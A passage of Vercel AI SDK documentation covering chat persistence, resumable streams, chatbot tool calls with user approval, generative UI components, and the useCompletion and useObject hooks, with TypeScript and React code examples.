    originalMessages: validatedMessages,
    onFinish: ({ messages }) => {
      saveChat({ chatId: id, messages });
    },
  });
}

Handling client disconnects

By default, the AI SDK streamText function uses backpressure to the language model provider to prevent the consumption of tokens that are not yet requested.

import { convertToModelMessages, streamText, UIMessage } from 'ai';
import { saveChat } from '@util/chat-store';

export async function POST(req: Request) {
  const { messages, chatId }: { messages: UIMessage[]; chatId: string } =
    await req.json();

  const result = streamText({
    model,
    messages: await convertToModelMessages(messages),
  });

  // consume the stream to ensure it runs to completion & triggers onFinish
  // even when the client response is aborted:
  result.consumeStream(); // no await

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    onFinish: ({ messages }) => {
      saveChat({ chatId, messages });
    },
  });
}

When the client reloads the page after a disconnect, the chat will be restored from the storage solution.

For more robust handling of disconnects, you may want to add resumability on disconnects. Check out the Chatbot Resume Streams documentation to learn more.

title: Chatbot Resume Streams description: Learn how to resume chatbot streams after client disconnects.

Chatbot Resume Streams

useChat supports resuming ongoing streams after page reloads. Use this feature to build applications with long-running generations.

How stream resumption works

Stream resumption requires persistence for messages and active streams in your application. The AI SDK provides tools to connect to storage, but you need to set up the storage yourself.

The AI SDK provides:

A resume option in useChat that automatically reconnects to active streams
Access to the outgoing stream through the consumeSseStream callback
Automatic HTTP requests to your resume endpoints

You build:

Storage to track which stream belongs to each chat
Redis to store the UIMessage stream
Two API endpoints: POST to create streams, GET to resume them
Integration with resumable-stream to manage Redis storage

Prerequisites

To implement resumable streams in your chat application, you need:

The resumable-stream package - Handles the publisher/subscriber mechanism for streams
A Redis instance - Stores stream data (e.g. Redis through Vercel)
A persistence layer - Tracks which stream ID is active for each chat (e.g. database)

Implementation

1. Client-side: Enable stream resumption

Use the resume option in the useChat hook to enable stream resumption. When resume is true, the hook automatically attempts to reconnect to any active stream for the chat on mount:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport, type UIMessage } from 'ai';

export function Chat({
  chatData,
  resume = false,
}: {
  chatData: { id: string; messages: UIMessage[] };
  resume?: boolean;
}) {
  const { messages, sendMessage, status } = useChat({
    id: chatData.id,
    messages: chatData.messages,
    resume, // Enable automatic stream resumption
    transport: new DefaultChatTransport({
      // You must send the id of the chat
      prepareSendMessagesRequest: ({ id, messages }) => {
        return {
          body: {
            id,
            message: messages[messages.length - 1],
          },
        };
      },
    }),
  });

  return <div>{/* Your chat UI */}</div>;
}

When you enable resume, the useChat hook makes a GET request to /api/chat/[id]/stream on mount to check for and resume any active streams.

Let's start by creating the POST handler to create the resumable stream.

2. Create the POST handler

The POST handler creates resumable streams using the consumeSseStream callback:

import { openai } from '@ai-sdk/openai';
import { readChat, saveChat } from '@util/chat-store';
import {
  convertToModelMessages,
  generateId,
  streamText,
  type UIMessage,
} from 'ai';
import { after } from 'next/server';
import { createResumableStreamContext } from 'resumable-stream';

export async function POST(req: Request) {
  const {
    message,
    id,
  }: {
    message: UIMessage | undefined;
    id: string;
  } = await req.json();

  const chat = await readChat(id);
  let messages = chat.messages;

  messages = [...messages, message!];

  // Clear any previous active stream and save the user message
  saveChat({ id, messages, activeStreamId: null });

  const result = streamText({
    model: 'openai/gpt-5-mini',
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    generateMessageId: generateId,
    onFinish: ({ messages }) => {
      // Clear the active stream when finished
      saveChat({ id, messages, activeStreamId: null });
    },
    async consumeSseStream({ stream }) {
      const streamId = generateId();

      // Create a resumable stream from the SSE stream
      const streamContext = createResumableStreamContext({ waitUntil: after });
      await streamContext.createNewResumableStream(streamId, () => stream);

      // Update the chat with the active stream ID
      saveChat({ id, activeStreamId: streamId });
    },
  });
}

3. Implement the GET handler

Create a GET handler at /api/chat/[id]/stream that:

Reads the chat ID from the route params
Loads the chat data to check for an active stream
Returns 204 (No Content) if no stream is active
Resumes the existing stream if one is found

import { readChat } from '@util/chat-store';
import { UI_MESSAGE_STREAM_HEADERS } from 'ai';
import { after } from 'next/server';
import { createResumableStreamContext } from 'resumable-stream';

export async function GET(
  _: Request,
  { params }: { params: Promise<{ id: string }> },
) {
  const { id } = await params;

  const chat = await readChat(id);

  if (chat.activeStreamId == null) {
    // no content response when there is no active stream
    return new Response(null, { status: 204 });
  }

  const streamContext = createResumableStreamContext({
    waitUntil: after,
  });

  return new Response(
    await streamContext.resumeExistingStream(chat.activeStreamId),
    { headers: UI_MESSAGE_STREAM_HEADERS },
  );
}

How it works

Request lifecycle

Diagram showing the architecture and lifecycle of resumable stream requests

The diagram above shows the complete lifecycle of a resumable stream:

Stream creation: When you send a new message, the POST handler uses streamText to generate the response. The consumeSseStream callback creates a resumable stream with a unique ID and stores it in Redis through the resumable-stream package
Stream tracking: Your persistence layer saves the activeStreamId in the chat data
Client reconnection: When the client reconnects (page reload), the resume option triggers a GET request to /api/chat/[id]/stream
Stream recovery: The GET handler checks for an activeStreamId and uses resumeExistingStream to reconnect. If no active stream exists, it returns a 204 (No Content) response
Completion cleanup: When the stream finishes, the onFinish callback clears the activeStreamId by setting it to null

Customize the resume endpoint

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

export function Chat({ chatData, resume }) {
  const { messages, sendMessage } = useChat({
    id: chatData.id,
    messages: chatData.messages,
    resume,
    transport: new DefaultChatTransport({
      // Customize reconnect settings (optional)
      prepareReconnectToStreamRequest: ({ id }) => {
        return {
          api: `/api/chat/${id}/stream`, // Default pattern
          // Or use a different pattern:
          // api: `/api/streams/${id}/resume`,
          // api: `/api/resume-chat?id=${id}`,
          credentials: 'include', // Include cookies/auth
          headers: {
            Authorization: 'Bearer token',
            'X-Custom-Header': 'value',
          },
        };
      },
    }),
  });

  return <div>{/* Your chat UI */}</div>;
}

This lets you:

Match your existing API route structure
Add query parameters or custom paths
Integrate with different backend architectures

Important considerations

Incompatibility with abort: Stream resumption is not compatible with abort functionality. Closing a tab or refreshing the page triggers an abort signal that will break the resumption mechanism. Do not use resume: true if you need abort functionality in your application
Stream expiration: Streams in Redis expire after a set time (configurable in the resumable-stream package)
Multiple clients: Multiple clients can connect to the same stream simultaneously
Error handling: When no active stream exists, the GET handler returns a 204 (No Content) status code
Security: Ensure proper authentication and authorization for both creating and resuming streams
Race conditions: Clear the activeStreamId when starting a new stream to prevent resuming outdated streams

title: Chatbot Tool Usage description: Learn how to use tools with the useChat hook.

Chatbot Tool Usage

With useChat and streamText, you can use tools in your chatbot application. The AI SDK supports three types of tools in this context:

Automatically executed server-side tools
Automatically executed client-side tools
Tools that require user interaction, such as confirmation dialogs

The flow is as follows:

The user enters a message in the chat UI.
The message is sent to the API route.
In your server side route, the language model generates tool calls during the streamText call.
All tool calls are forwarded to the client.
Server-side tools are executed using their execute method and their results are forwarded to the client.
Client-side tools that should be automatically executed are handled with the onToolCall callback. You must call addToolOutput to provide the tool result.
Client-side tool that require user interactions can be displayed in the UI. The tool calls and results are available as tool invocation parts in the parts property of the last assistant message.
When the user interaction is done, addToolOutput can be used to add the tool result to the chat.
The chat can be configured to automatically submit when all tool results are available using sendAutomaticallyWhen. This triggers another iteration of this flow.

Example

In this example, we'll use three tools:

getWeatherInformation: An automatically executed server-side tool that returns the weather in a given city.
askForConfirmation: A user-interaction client-side tool that asks the user for confirmation.
getLocation: An automatically executed client-side tool that returns a random city.

API route

import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
    tools: {
      // server-side tool with execute function:
      getWeatherInformation: {
        description: 'show the weather in a given city to the user',
        inputSchema: z.object({ city: z.string() }),
        execute: async ({}: { city: string }) => {
          const weatherOptions = ['sunny', 'cloudy', 'rainy', 'snowy', 'windy'];
          return weatherOptions[
            Math.floor(Math.random() * weatherOptions.length)
          ];
        },
      },
      // client-side tool that starts user interaction:
      askForConfirmation: {
        description: 'Ask the user for confirmation.',
        inputSchema: z.object({
          message: z.string().describe('The message to ask for confirmation.'),
        }),
      },
      // client-side tool that is automatically executed on the client:
      getLocation: {
        description:
          'Get the user location. Always ask for confirmation before using this tool.',
        inputSchema: z.object({}),
      },
    },
  });

  return result.toUIMessageStreamResponse();
}

Client-side page

There are three things worth mentioning:

The onToolCall callback is used to handle client-side tools that should be automatically executed. In this example, the getLocation tool is a client-side tool that returns a random city. You call addToolOutput to provide the result (without await to avoid potential deadlocks).
The sendAutomaticallyWhen option with lastAssistantMessageIsCompleteWithToolCalls helper automatically submits when all tool results are available.
The parts array of assistant messages contains tool parts with typed names like tool-askForConfirmation. The client-side tool askForConfirmation is displayed in the UI. It asks the user for confirmation and displays the result once the user confirms or denies the execution. The result is added to the chat using addToolOutput with the tool parameter for type safety.

'use client';

import { useChat } from '@ai-sdk/react';
import {
  DefaultChatTransport,
  lastAssistantMessageIsCompleteWithToolCalls,
} from 'ai';
import { useState } from 'react';

export default function Chat() {
  const { messages, sendMessage, addToolOutput } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),

    sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithToolCalls,

    // run client-side tools that are automatically executed:
    async onToolCall({ toolCall }) {
      // Check if it's a dynamic tool first for proper type narrowing
      if (toolCall.dynamic) {
        return;
      }

      if (toolCall.toolName === 'getLocation') {
        const cities = ['New York', 'Los Angeles', 'Chicago', 'San Francisco'];

        // No await - avoids potential deadlocks
        addToolOutput({
          tool: 'getLocation',
          toolCallId: toolCall.toolCallId,
          output: cities[Math.floor(Math.random() * cities.length)],
        });
      }
    },
  });
  const [input, setInput] = useState('');

  return (
    <>
      {messages?.map(message => (
        <div key={message.id}>
          <strong>{`${message.role}: `}</strong>
          {message.parts.map(part => {
            switch (part.type) {
              // render text parts as simple text:
              case 'text':
                return part.text;

              // for tool parts, use the typed tool part names:
              case 'tool-askForConfirmation': {
                const callId = part.toolCallId;

                switch (part.state) {
                  case 'input-streaming':
                    return (
                      <div key={callId}>Loading confirmation request...</div>
                    );
                  case 'input-available':
                    return (
                      <div key={callId}>
                        {part.input.message}
                        <div>
                          <button
                            onClick={() =>
                              addToolOutput({
                                tool: 'askForConfirmation',
                                toolCallId: callId,
                                output: 'Yes, confirmed.',
                              })
                            }
                          >
                            Yes
                          </button>
                          <button
                            onClick={() =>
                              addToolOutput({
                                tool: 'askForConfirmation',
                                toolCallId: callId,
                                output: 'No, denied',
                              })
                            }
                          >
                            No
                          </button>
                        </div>
                      </div>
                    );
                  case 'output-available':
                    return (
                      <div key={callId}>
                        Location access allowed: {part.output}
                      </div>
                    );
                  case 'output-error':
                    return <div key={callId}>Error: {part.errorText}</div>;
                }
                break;
              }

              case 'tool-getLocation': {
                const callId = part.toolCallId;

                switch (part.state) {
                  case 'input-streaming':
                    return (
                      <div key={callId}>Preparing location request...</div>
                    );
                  case 'input-available':
                    return <div key={callId}>Getting location...</div>;
                  case 'output-available':
                    return <div key={callId}>Location: {part.output}</div>;
                  case 'output-error':
                    return (
                      <div key={callId}>
                        Error getting location: {part.errorText}
                      </div>
                    );
                }
                break;
              }

              case 'tool-getWeatherInformation': {
                const callId = part.toolCallId;

                switch (part.state) {
                  // example of pre-rendering streaming tool inputs:
                  case 'input-streaming':
                    return (
                      <pre key={callId}>{JSON.stringify(part, null, 2)}</pre>
                    );
                  case 'input-available':
                    return (
                      <div key={callId}>
                        Getting weather information for {part.input.city}...
                      </div>
                    );
                  case 'output-available':
                    return (
                      <div key={callId}>
                        Weather in {part.input.city}: {part.output}
                      </div>
                    );
                  case 'output-error':
                    return (
                      <div key={callId}>
                        Error getting weather for {part.input.city}:{' '}
                        {part.errorText}
                      </div>
                    );
                }
                break;
              }
            }
          })}
          <br />
        </div>
      ))}

      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input value={input} onChange={e => setInput(e.target.value)} />
      </form>
    </>
  );
}

Error handling

Sometimes an error may occur during client-side tool execution. Use the addToolOutput method with a state of output-error and errorText value instead of output record the error.

'use client';

import { useChat } from '@ai-sdk/react';
import {
  DefaultChatTransport,
  lastAssistantMessageIsCompleteWithToolCalls,
} from 'ai';
import { useState } from 'react';

export default function Chat() {
  const { messages, sendMessage, addToolOutput } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),

    sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithToolCalls,

    // run client-side tools that are automatically executed:
    async onToolCall({ toolCall }) {
      // Check if it's a dynamic tool first for proper type narrowing
      if (toolCall.dynamic) {
        return;
      }

      if (toolCall.toolName === 'getWeatherInformation') {
        try {
          const weather = await getWeatherInformation(toolCall.input);

          // No await - avoids potential deadlocks
          addToolOutput({
            tool: 'getWeatherInformation',
            toolCallId: toolCall.toolCallId,
            output: weather,
          });
        } catch (err) {
          addToolOutput({
            tool: 'getWeatherInformation',
            toolCallId: toolCall.toolCallId,
            state: 'output-error',
            errorText: 'Unable to get the weather information',
          });
        }
      }
    },
  });
}

Tool Execution Approval

Use tool execution approval when you want to:

Confirm sensitive operations (payments, deletions, external API calls)
Let users review tool inputs before execution
Add human oversight to automated workflows

For tools that need to run in the browser (updating UI state, accessing browser APIs), use client-side tools instead.

Server Setup

Enable approval by setting needsApproval on your tool. See Tool Execution Approval for configuration options including dynamic approval based on input.

import { streamText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

export async function POST(req: Request) {
  const { messages } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages,
    tools: {
      getWeather: tool({
        description: 'Get the weather in a location',
        inputSchema: z.object({
          city: z.string(),
        }),
        needsApproval: true,
        execute: async ({ city }) => {
          const weather = await fetchWeather(city);
          return weather;
        },
      }),
    },
  });

  return result.toUIMessageStreamResponse();
}

Client-Side Approval UI

When a tool requires approval, the tool part state is approval-requested. Use addToolApprovalResponse to approve or deny:

'use client';

import { useChat } from '@ai-sdk/react';

export default function Chat() {
  const { messages, addToolApprovalResponse } = useChat();

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.parts.map(part => {
            if (part.type === 'tool-getWeather') {
              switch (part.state) {
                case 'approval-requested':
                  return (
                    <div key={part.toolCallId}>
                      <p>Get weather for {part.input.city}?</p>
                      <button
                        onClick={() =>
                          addToolApprovalResponse({
                            id: part.approval.id,
                            approved: true,
                          })
                        }
                      >
                        Approve
                      </button>
                      <button
                        onClick={() =>
                          addToolApprovalResponse({
                            id: part.approval.id,
                            approved: false,
                          })
                        }
                      >
                        Deny
                      </button>
                    </div>
                  );
                case 'output-available':
                  return (
                    <div key={part.toolCallId}>
                      Weather in {part.input.city}: {part.output}
                    </div>
                  );
              }
            }
            // Handle other part types...
          })}
        </div>
      ))}
    </>
  );
}

Auto-Submit After Approval

Use lastAssistantMessageIsCompleteWithApprovalResponses to automatically continue the conversation after approvals:

import { useChat } from '@ai-sdk/react';
import { lastAssistantMessageIsCompleteWithApprovalResponses } from 'ai';

const { messages, addToolApprovalResponse } = useChat({
  sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithApprovalResponses,
});

Dynamic Tools

When using dynamic tools (tools with unknown types at compile time), the UI parts use a generic dynamic-tool type instead of specific tool types:

{
  message.parts.map((part, index) => {
    switch (part.type) {
      // Static tools with specific (`tool-${toolName}`) types
      case 'tool-getWeatherInformation':
        return <WeatherDisplay part={part} />;

      // Dynamic tools use generic `dynamic-tool` type
      case 'dynamic-tool':
        return (
          <div key={index}>
            <h4>Tool: {part.toolName}</h4>
            {part.state === 'input-streaming' && (
              <pre>{JSON.stringify(part.input, null, 2)}</pre>
            )}
            {part.state === 'output-available' && (
              <pre>{JSON.stringify(part.output, null, 2)}</pre>
            )}
            {part.state === 'output-error' && (
              <div>Error: {part.errorText}</div>
            )}
          </div>
        );
    }
  });
}

Dynamic tools are useful when integrating with:

MCP (Model Context Protocol) tools without schemas
User-defined functions loaded at runtime
External tool providers

Tool call streaming

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
    // toolCallStreaming is enabled by default in v5
    // ...
  });

  return result.toUIMessageStreamResponse();
}

export default function Chat() {
  // ...
  return (
    <>
      {messages?.map(message => (
        <div key={message.id}>
          {message.parts.map(part => {
            switch (part.type) {
              case 'tool-askForConfirmation':
              case 'tool-getLocation':
              case 'tool-getWeatherInformation':
                switch (part.state) {
                  case 'input-streaming':
                    return <pre>{JSON.stringify(part.input, null, 2)}</pre>;
                  case 'input-available':
                    return <pre>{JSON.stringify(part.input, null, 2)}</pre>;
                  case 'output-available':
                    return <pre>{JSON.stringify(part.output, null, 2)}</pre>;
                  case 'output-error':
                    return <div>Error: {part.errorText}</div>;
                }
            }
          })}
        </div>
      ))}
    </>
  );
}

Step start parts

// ...
// where you render the message parts:
message.parts.map((part, index) => {
  switch (part.type) {
    case 'step-start':
      // show step boundaries as horizontal lines:
      return index > 0 ? (
        <div key={index} className="text-gray-500">
          <hr className="my-2 border-gray-300" />
        </div>
      ) : null;
    case 'text':
    // ...
    case 'tool-askForConfirmation':
    case 'tool-getLocation':
    case 'tool-getWeatherInformation':
    // ...
  }
});
// ...

Server-side Multi-Step Calls

You can also use multi-step calls on the server-side with streamText. This works when all invoked tools have an execute function on the server side.

import { convertToModelMessages, streamText, UIMessage, isStepCount } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
    tools: {
      getWeatherInformation: {
        description: 'show the weather in a given city to the user',
        inputSchema: z.object({ city: z.string() }),
        // tool has execute function:
        execute: async ({}: { city: string }) => {
          const weatherOptions = ['sunny', 'cloudy', 'rainy', 'snowy', 'windy'];
          return weatherOptions[
            Math.floor(Math.random() * weatherOptions.length)
          ];
        },
      },
    },
    stopWhen: isStepCount(5),
  });

  return result.toUIMessageStreamResponse();
}

Errors

Language models can make errors when calling tools. By default, these errors are masked for security reasons, and show up as "An error occurred" in the UI.

To surface the errors, you can use the onError function when calling toUIMessageResponse.

export function errorHandler(error: unknown) {
  if (error == null) {
    return 'unknown error';
  }

  if (typeof error === 'string') {
    return error;
  }

  if (error instanceof Error) {
    return error.message;
  }

  return JSON.stringify(error);
}

const result = streamText({
  // ...
});

return result.toUIMessageStreamResponse({
  onError: errorHandler,
});

In case you are using createUIMessageResponse, you can use the onError function when calling toUIMessageResponse:

const response = createUIMessageResponse({
  // ...
  async execute(dataStream) {
    // ...
  },
  onError: error => `Custom error: ${error.message}`,
});

title: Generative User Interfaces description: Learn how to build Generative UI with AI SDK UI.

Generative User Interfaces

Generative UI is the process of connecting the results of a tool call to a React component. Here's how it works:

You provide the model with a prompt or conversation history, along with a set of tools.
Based on the context, the model may decide to call a tool.
If a tool is called, it will execute and return data.
This data can then be passed to a React component for rendering.

By passing the tool results to React components, you can create a generative UI experience that's more engaging and adaptive to your needs.

Build a Generative UI Chat Interface

Let's create a chat interface that handles text-based conversations and incorporates dynamic UI elements based on model responses.

Basic Chat Implementation

Start with a basic chat implementation using the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    sendMessage({ text: input });
    setInput('');
  };

  return (
    <div>
      {messages.map(message => (
        <div key={message.id}>
          <div>{message.role === 'user' ? 'User: ' : 'AI: '}</div>
          <div>
            {message.parts.map((part, index) => {
              if (part.type === 'text') {
                return <span key={index}>{part.text}</span>;
              }
              return null;
            })}
          </div>
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          placeholder="Type a message..."
        />
        <button type="submit">Send</button>
      </form>
    </div>
  );
}

To handle the chat requests and model responses, set up an API route:

import { streamText, convertToModelMessages, UIMessage, isStepCount } from 'ai';
__PROVIDER_IMPORT__;

export async function POST(request: Request) {
  const { messages }: { messages: UIMessage[] } = await request.json();

  const result = streamText({
    model: __MODEL__,
    system: 'You are a friendly assistant!',
    messages: await convertToModelMessages(messages),
    stopWhen: isStepCount(5),
  });

  return result.toUIMessageStreamResponse();
}

This API route uses the streamText function to process chat messages and stream the model's responses back to the client.

Create a Tool

Create a new file called ai/tools.ts with the following content:

import { tool as createTool } from 'ai';
import { z } from 'zod';

export const weatherTool = createTool({
  description: 'Display the weather for a location',
  inputSchema: z.object({
    location: z.string().describe('The location to get the weather for'),
  }),
  execute: async function ({ location }) {
    await new Promise(resolve => setTimeout(resolve, 2000));
    return { weather: 'Sunny', temperature: 75, location };
  },
});

export const tools = {
  displayWeather: weatherTool,
};

Update the API Route

Update the API route to include the tool you've defined:

import { streamText, convertToModelMessages, UIMessage, isStepCount } from 'ai';
__PROVIDER_IMPORT__;
import { tools } from '@/ai/tools';

export async function POST(request: Request) {
  const { messages }: { messages: UIMessage[] } = await request.json();

  const result = streamText({
    model: __MODEL__,
    system: 'You are a friendly assistant!',
    messages: await convertToModelMessages(messages),
    stopWhen: isStepCount(5),
    tools,
  });

  return result.toUIMessageStreamResponse();
}

Now that you've defined the tool and added it to your streamText call, let's build a React component to display the weather information it returns.

Create UI Components

Create a new file called components/weather.tsx:

type WeatherProps = {
  temperature: number;
  weather: string;
  location: string;
};

export const Weather = ({ temperature, weather, location }: WeatherProps) => {
  return (
    <div>
      <h2>Current Weather for {location}</h2>
      <p>Condition: {weather}</p>
      <p>Temperature: {temperature}°C</p>
    </div>
  );
};

This component will display the weather information for a given location. It takes three props: temperature, weather, and location (exactly what the weatherTool returns).

Render the Weather Component

Now that you have your tool and corresponding React component, let's integrate them into your chat interface. You'll render the Weather component when the model calls the weather tool.

Update your page.tsx file:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { Weather } from '@/components/weather';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    sendMessage({ text: input });
    setInput('');
  };

  return (
    <div>
      {messages.map(message => (
        <div key={message.id}>
          <div>{message.role === 'user' ? 'User: ' : 'AI: '}</div>
          <div>
            {message.parts.map((part, index) => {
              if (part.type === 'text') {
                return <span key={index}>{part.text}</span>;
              }

              if (part.type === 'tool-displayWeather') {
                switch (part.state) {
                  case 'input-available':
                    return <div key={index}>Loading weather...</div>;
                  case 'output-available':
                    return (
                      <div key={index}>
                        <Weather {...part.output} />
                      </div>
                    );
                  case 'output-error':
                    return <div key={index}>Error: {part.errorText}</div>;
                  default:
                    return null;
                }
              }

              return null;
            })}
          </div>
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          placeholder="Type a message..."
        />
        <button type="submit">Send</button>
      </form>
    </div>
  );
}

In this updated code snippet, you:

Use manual input state management with useState instead of the built-in input and handleInputChange.
Use sendMessage instead of handleSubmit to send messages.
Check the parts array of each message for different content types.
Handle tool parts with type tool-displayWeather and their different states (input-available, output-available, output-error).

This approach allows you to dynamically render UI components based on the model's responses, creating a more interactive and context-aware chat experience.

Expanding Your Generative UI Application

You can enhance your chat application by adding more tools and components, creating a richer and more versatile user experience. Here's how you can expand your application:

Adding More Tools

To add more tools, simply define them in your ai/tools.ts file:

// Add a new stock tool
export const stockTool = createTool({
  description: 'Get price for a stock',
  inputSchema: z.object({
    symbol: z.string().describe('The stock symbol to get the price for'),
  }),
  execute: async function ({ symbol }) {
    // Simulated API call
    await new Promise(resolve => setTimeout(resolve, 2000));
    return { symbol, price: 100 };
  },
});

// Update the tools object
export const tools = {
  displayWeather: weatherTool,
  getStockPrice: stockTool,
};

Now, create a new file called components/stock.tsx:

type StockProps = {
  price: number;
  symbol: string;
};

export const Stock = ({ price, symbol }: StockProps) => {
  return (
    <div>
      <h2>Stock Information</h2>
      <p>Symbol: {symbol}</p>
      <p>Price: ${price}</p>
    </div>
  );
};

Finally, update your page.tsx file to include the new Stock component:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { Weather } from '@/components/weather';
import { Stock } from '@/components/stock';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    sendMessage({ text: input });
    setInput('');
  };

  return (
    <div>
      {messages.map(message => (
        <div key={message.id}>
          <div>{message.role}</div>
          <div>
            {message.parts.map((part, index) => {
              if (part.type === 'text') {
                return <span key={index}>{part.text}</span>;
              }

              if (part.type === 'tool-displayWeather') {
                switch (part.state) {
                  case 'input-available':
                    return <div key={index}>Loading weather...</div>;
                  case 'output-available':
                    return (
                      <div key={index}>
                        <Weather {...part.output} />
                      </div>
                    );
                  case 'output-error':
                    return <div key={index}>Error: {part.errorText}</div>;
                  default:
                    return null;
                }
              }

              if (part.type === 'tool-getStockPrice') {
                switch (part.state) {
                  case 'input-available':
                    return <div key={index}>Loading stock price...</div>;
                  case 'output-available':
                    return (
                      <div key={index}>
                        <Stock {...part.output} />
                      </div>
                    );
                  case 'output-error':
                    return <div key={index}>Error: {part.errorText}</div>;
                  default:
                    return null;
                }
              }

              return null;
            })}
          </div>
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          type="text"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Send</button>
      </form>
    </div>
  );
}

By following this pattern, you can continue to add more tools and components, expanding the capabilities of your Generative UI application.

title: Completion description: Learn how to use the useCompletion hook.

Completion

In this guide, you will learn how to use the useCompletion hook in your application to generate text completions and stream them in real-time to your users.

Example

'use client';

import { useCompletion } from '@ai-sdk/react';

export default function Page() {
  const { completion, input, handleInputChange, handleSubmit } = useCompletion({
    api: '/api/completion',
  });

  return (
    <form onSubmit={handleSubmit}>
      <input
        name="prompt"
        value={input}
        onChange={handleInputChange}
        id="input"
      />
      <button type="submit">Submit</button>
      <div>{completion}</div>
    </form>
  );
}

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { prompt }: { prompt: string } = await req.json();

  const result = streamText({
    model: __MODEL__,
    prompt,
  });

  return result.toUIMessageStreamResponse();
}

This enables a seamless text completion experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.

Customized UI

useCompletion also provides ways to manage the prompt via code, show loading and error states, and update messages without being triggered by user interactions.

Loading and error states

To show a loading spinner while the chatbot is processing the user's message, you can use the isLoading state returned by the useCompletion hook:

const { isLoading, ... } = useCompletion()

return(
  <>
    {isLoading ? <Spinner /> : null}
  </>
)

Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, or show a toast notification:

const { error, ... } = useCompletion()

useEffect(() => {
  if (error) {
    toast.error(error.message)
  }
}, [error])

// Or display the error message in the UI:
return (
  <>
    {error ? <div>{error.message}</div> : null}
  </>
)

Controlled input

The following example demonstrates how to use more granular APIs like setInput with your custom input and submit button components:

const { input, setInput } = useCompletion();

return (
  <>
    <MyCustomInput value={input} onChange={value => setInput(value)} />
  </>
);

Cancelation

It's also a common use case to abort the response message while it's still streaming back from the AI provider. You can do this by calling the stop function returned by the useCompletion hook.

const { stop, isLoading, ... } = useCompletion()

return (
  <>
    <button onClick={stop} disabled={!isLoading}>Stop</button>
  </>
)

When the user clicks the "Stop" button, the fetch request will be aborted. This avoids consuming unnecessary resources and improves the UX of your application.

Throttling UI Updates

This feature is currently only available for React.

By default, the useCompletion hook will trigger a render every time a new chunk is received. You can throttle the UI updates with the experimental_throttle option.

const { completion, ... } = useCompletion({
  // Throttle the completion and data updates to 50ms:
  experimental_throttle: 50
})

Event Callbacks

const { ... } = useCompletion({
  onFinish: (prompt: string, completion: string) => {
    console.log('Finished streaming completion:', completion)
  },
  onError: (error: Error) => {
    console.error('An error occurred:', error)
  },
})

Configure Request Options

const { messages, input, handleInputChange, handleSubmit } = useCompletion({
  api: '/api/custom-completion',
  headers: {
    Authorization: 'your_token',
  },
  body: {
    user_id: '123',
  },
  credentials: 'same-origin',
});

title: Object Generation description: Learn how to use the useObject hook.

Object Generation

The useObject hook allows you to create interfaces that represent a structured JSON object that is being streamed.

In this guide, you will learn how to use the useObject hook in your application to generate UIs for structured data on the fly.

Example

The example shows a small notifications demo app that generates fake notifications in real-time.

Schema

It is helpful to set up the schema in a separate file that is imported on both the client and server.

import { z } from 'zod';

// define a schema for the notifications
export const notificationSchema = z.object({
  notifications: z.array(
    z.object({
      name: z.string().describe('Name of a fictional person.'),
      message: z.string().describe('Message. Do not use emojis or links.'),
    }),
  ),
});

Client

The client uses useObject to stream the object generation process.

The results are partial and are displayed as they are received. Please note the code for handling undefined values in the JSX.

'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';

export default function Page() {
  const { object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
  });

  return (
    <>
      <button onClick={() => submit('Messages during finals week.')}>
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </>
  );
}

Server

On the server, we use streamText with Output.object() to stream the object generation process.

import { streamText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { notificationSchema } from './schema';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const context = await req.json();

  const result = streamText({
    model: __MODEL__,
    output: Output.object({ schema: notificationSchema }),
    prompt:
